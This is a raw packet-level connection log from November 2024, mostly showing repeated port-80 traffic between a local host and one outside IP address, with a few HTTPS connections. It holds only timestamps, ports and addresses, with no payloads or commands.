Nov 7, 2024 07:33:25.090533972 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.090543985 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.090596914 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.090606928 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.090646029 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.090655088 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.090686083 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.090696096 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.090704918 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.090732098 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.090754032 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.090812922 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.090825081 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.090835094 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.090862989 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.090882063 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.090993881 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.091003895 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.091013908 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.091026068 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.091036081 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.091037035 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.091048002 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.091067076 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.091079950 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.091211081 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.091222048 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.091233015 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.091254950 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.091279984 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.095561028 CET	443	49897	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.107387066 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:25.107394934 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:25.116182089 CET	49897	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.116208076 CET	443	49897	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.116605997 CET	49897	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.116611004 CET	443	49897	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.132374048 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.132392883 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.132402897 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.132455111 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.132477045 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.145392895 CET	49900	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.145421982 CET	443	49900	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.145576954 CET	49900	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.149203062 CET	49900	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.149218082 CET	443	49900	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.155441999 CET	49901	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.155473948 CET	443	49901	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.155535936 CET	49901	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.155719995 CET	49901	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.155735016 CET	443	49901	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.167254925 CET	49902	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.167279005 CET	443	49902	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.167365074 CET	49902	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.172525883 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.172539949 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.172565937 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.172578096 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.172585964 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.172593117 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.172599077 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.172606945 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.172657967 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.172694921 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.172738075 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.172759056 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.172782898 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.172794104 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.172815084 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.172830105 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.172841072 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.172861099 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.172888041 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.172914028 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.172977924 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.172987938 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.173023939 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.173093081 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.173135042 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.173166990 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.173177958 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.173187017 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.173198938 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.173211098 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.173243046 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.173358917 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.173368931 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.173377991 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.173388004 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.173397064 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.173405886 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.173408031 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.173418045 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.173425913 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.173448086 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.173459053 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.173598051 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.173607111 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.173643112 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.173702002 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.173712015 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.173722029 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.173732996 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.173742056 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.173743010 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.173753977 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.173758030 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.173767090 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.173790932 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.173819065 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.173991919 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.174001932 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.174017906 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.174029112 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.174040079 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.174042940 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.174050093 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.174060106 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.174071074 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.174074888 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.174082994 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.174089909 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.174109936 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.174137115 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.174422979 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.174433947 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.174443960 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.174453020 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.174463034 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.174468040 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.174472094 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.174482107 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.174491882 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.174498081 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.174499989 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.174520969 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.174545050 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.174798012 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.174813032 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.174823046 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.174834013 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.174844027 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.174849033 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.174860954 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.174866915 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.174896955 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.175060987 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175071001 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175081015 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175101995 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175101995 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.175120115 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175129890 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.175131083 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175142050 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175151110 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175158024 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.175163984 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175173044 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.175173044 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175189018 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175193071 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.175199986 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175209045 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175220013 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.175220013 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175249100 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.175263882 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.175780058 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175790071 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175797939 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175808907 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175817966 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175826073 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.175828934 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175837994 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175847054 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175857067 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175862074 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.175867081 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175878048 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175884008 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.175887108 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175899029 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175906897 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.175909042 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175920963 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175930023 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.175931931 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175937891 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.175942898 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.175977945 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.176373959 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.176383972 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.176397085 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.176403046 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.176413059 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.176424980 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.176434994 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.176448107 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.176476955 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.176599979 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.176610947 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.176620960 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.176637888 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.176666975 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.210019112 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.210040092 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.210051060 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.210068941 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.210091114 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.210119963 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.210197926 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.210207939 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.210216999 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.210241079 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.210258007 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.210326910 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.210344076 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.210355997 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.210381985 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.210431099 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.210438967 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.210448027 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.210479975 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.210488081 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.210499048 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.210525990 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.210555077 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.210592985 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.210622072 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.210668087 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.210684061 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.210695028 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.210705042 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.210721970 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.210752964 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.210913897 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.210923910 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.210935116 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.210942984 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.210949898 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.210953951 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.210975885 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.211009979 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.211049080 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.211060047 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.211107016 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.211164951 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.211175919 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.211184978 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.211211920 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.211241007 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.248677969 CET	443	49897	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.248724937 CET	443	49897	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.248809099 CET	49897	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.251858950 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.251889944 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.251900911 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.251904011 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.251931906 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.251938105 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.251950979 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.251974106 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.292157888 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.292193890 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.292206049 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.292231083 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.292254925 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.292279959 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.292290926 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.292327881 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.292354107 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.292422056 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.292433023 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.292462111 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.292490005 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.292515993 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.292577028 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.292587996 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.292598009 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.292609930 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.292624950 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.292651892 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.292794943 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.292805910 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.292818069 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.292831898 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.292849064 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.292874098 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.292994976 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.293005943 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.293015957 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.293028116 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.293041945 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.293070078 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.293126106 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.293137074 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.293169022 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.293176889 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.293188095 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.293196917 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.293209076 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.293216944 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.293229103 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.293253899 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.293426991 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.293438911 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.293450117 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.293461084 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.293472052 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.293478012 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.293504953 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.293682098 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.293694019 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.293706894 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.293726921 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.293730974 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.293741941 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.293751001 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.293755054 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.293762922 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.293773890 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.293782949 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.293783903 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.293798923 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.293827057 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.294136047 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.294146061 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.294154882 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.294167995 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.294178963 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.294183969 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.294188976 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.294204950 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.294218063 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.294389009 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.294399977 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.294421911 CET	80	49882	185.215.113.16	192.168.2.4
